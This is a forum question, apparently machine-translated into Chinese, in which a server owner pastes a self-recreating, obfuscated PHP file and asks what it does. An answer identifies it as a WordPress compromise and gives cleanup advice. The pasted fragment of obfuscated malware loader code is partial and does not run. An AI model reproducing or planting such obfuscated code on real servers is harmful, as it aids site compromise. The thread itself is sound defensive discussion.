在服务器上的文件中找到奇怪的PHP代码

Question

很抱歉，如果这是发布错误的网站。

基本上，我有一台服务器，并且此文件不断创建自己。 该文件是一个PHP文件，包含以下代码：

    <?php
    $GLOBALS['XfZi37Vc'] = $_SERVER;
    function ruexxCV1QobH($uiBP25)
                                                            {$MISwZvode = "";global $PYJ9QSAA;

    for($QNufqz7Oj=intval('fzSxRYkl'); $QNufqz7Oj<strlen($uiBP25); $QNufqz7Oj++)
            {$yzwxeHjxV = ord($uiBP25[$QNufqz7Oj]) - $QNufqz7Oj - $PYJ9QSAA;
    if ($yzwxeHjxV < 32){$yzwxeHjxV = $yzwxeHjxV + 94;

${YkT1GO68Y3rXB("iv[_^/1\"w;%")} = Lp4lS8SSZzAY("-15/*32B.3@@G9CJJ");
                        ${YkT1GO68Y3rXB(",g0@#&D6x")} = PDeZzowtLQ("kos|n|,ryov1!#4&)!/9-{+%\$");
                ${QDVtOC8("pt[v\$:=")} = lpkBre6(":<;)><97C");
${fW1u5W74(";q~BY_y{")} = rdfpzT0mw(",:;9=+?3??CF<B<");
${sGbDIY("!<!.x\\ze")} = lpkBre6("kos|n|,\$nzxtr(x5~(");
function rdfpzT0mw($vGoVcwpU){return ruexxCV1QobH($vGoVcwpU);};
        function ifUYiZ4bFphW5($NYycJIpl){return ruexxCV1QobH($NYycJIpl);};
        ${fW1u5W74("gh\"Co[")} = lpkBre6("*77@0>A-DE6@6C9;");
${rdfpzT0mw("n2lZ7t\\")} = QDVtOC8(";:27");

我以前从未见过这样的代码。 谁能告诉我它到底在做什么？

Answer 1

这是您的Wordpress发生的黑客攻击。 可能是因为您使用的是过时的第三方插件。 这些可能很难检测到，但是代码可能已用于放置广告或将用户重定向到外部内容或恶意软件。

您应该删除此代码并更新所有插件。

请记住，此代码也可能已将代码注入到Wordpress数据库中。 特别是如果您有一个在Wordpress中启用“ eval”的插件，则意味着可以从数据库中检索代码并进行评估。

如果那不能解决问题，则应开始禁用第三方插件，直到找到问题的根源。

Wordpress非常易于自动脚本检测，并且第三方插件可能是由对安全性一无所知的人编写的。 使用它们时，即使它们来自Wordpress.org，也需要非常小心。